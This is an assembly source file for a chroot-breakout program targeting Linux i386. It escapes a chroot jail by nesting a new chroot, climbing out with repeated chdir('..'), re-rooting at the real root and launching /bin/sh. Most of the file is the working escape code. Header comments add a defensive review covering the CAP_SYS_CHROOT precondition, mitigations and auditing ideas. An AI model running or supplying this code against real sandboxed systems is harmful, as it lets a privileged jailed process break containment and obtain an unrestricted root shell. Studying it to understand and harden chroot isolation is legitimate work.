;-----------------------------------------------------------------------
; breakout.asm
; simple chroot-breakout
; Build: this asm version must be processed by "nasm -f bin" to produce
;        an executable.
; Frank Bergmann www.tuxad.com, 03/2011
;
; Syntax: NASM (Intel operand order).
; Target: Linux i386, int 0x80 syscall ABI
;         eax = syscall number, ebx / ecx / edx = arguments 1..3.
;         Only eax is changed by the kernel on return; this code relies
;         on ebx and ecx surviving each int 0x80.
;
; Syscall sequence issued by _start:
;   chdir("/tmp")
;   mkdir(",", 0700)
;   chroot(",")            ; cwd is NOT moved, so it is now outside the root
;   chdir("..") x 30       ; ".." is no longer stopped at the old jail root
;   chroot(".")
;   execve("/bin/sh", {"/bin/sh", NULL}, NULL)
;   _exit(0)               ; reached only if execve() returns
;
; Review notes (defensive reading):
;   - chroot() needs CAP_SYS_CHROOT (normally root). The sequence only
;     has an effect when the jailed process still holds that privilege,
;     which is why chroot(2) by itself is not a containment boundary.
;     Dropping root / CAP_SYS_CHROOT before running untrusted code,
;     pivot_root with mount namespaces, or a seccomp filter that denies
;     chroot all remove the precondition.
;   - A chroot() call made by an already-jailed process is unusual and
;     is a reasonable event to audit.
;   - No return value is checked: if mkdir() or chroot() fails, the
;     shell is still exec'ed, just without the root having changed.
;   - lib/elfheader.asm is not shown here; presumably it emits the ELF
;     header for the flat binary (and BITS / org) and uses _start and
;     filesize -- confirm against that file.
;-----------------------------------------------------------------------

%include "lib/elfheader.asm"

_start:
        ; chdir("/tmp")
        mov     ebx, tmpdir
        mov     eax, 12                 ; chdir
        int     0x80

        ; mkdir(",", 0700)
        mov     ebx, rootdir
        mov     ecx, 448                ; mode 0700 octal
        mov     eax, 39                 ; mkdir
        int     0x80

        ; chroot(",") -- ebx still points at rootdir
        mov     eax, 61                 ; chroot
        int     0x80

        ; chdir("..") thirty times. 30 is only an upper bound on the
        ; directory depth; ".." at the real / stays at /.
        mov     ebx, pardir
        mov     ecx, 30                 ; iterations left (not a chdir arg)
.climb:
        mov     eax, 12                 ; chdir
        int     0x80
        dec     ecx
        jnz     .climb

        ; chroot(".") -- "." is the tail of the ".." string
        mov     ebx, pardir + 1
        mov     eax, 61                 ; chroot
        int     0x80

        ; execve("/bin/sh", sha, NULL)
        mov     ebx, sh                 ; path
        mov     ecx, sha                ; argv = { sh, NULL }
        xor     edx, edx                ; envp = NULL
        mov     eax, 11                 ; execve
        int     0x80

        ; _exit(0) -- only reached when execve() failed
        xor     ebx, ebx
        mov     eax, 1                  ; exit
        int     0x80

; ---- data (same flat image as the code; read-only by use) -------------
rootdir:        db      ",", 0          ; directory created under /tmp
sha:            dd      sh, 0           ; argv vector for execve
sh:             db      "/bin/sh", 0
pardir:         db      "..", 0         ; pardir + 1 doubles as "."
tmpdir:         db      "/tmp", 0

filesize        equ     $ - $$          ; bytes from section start to here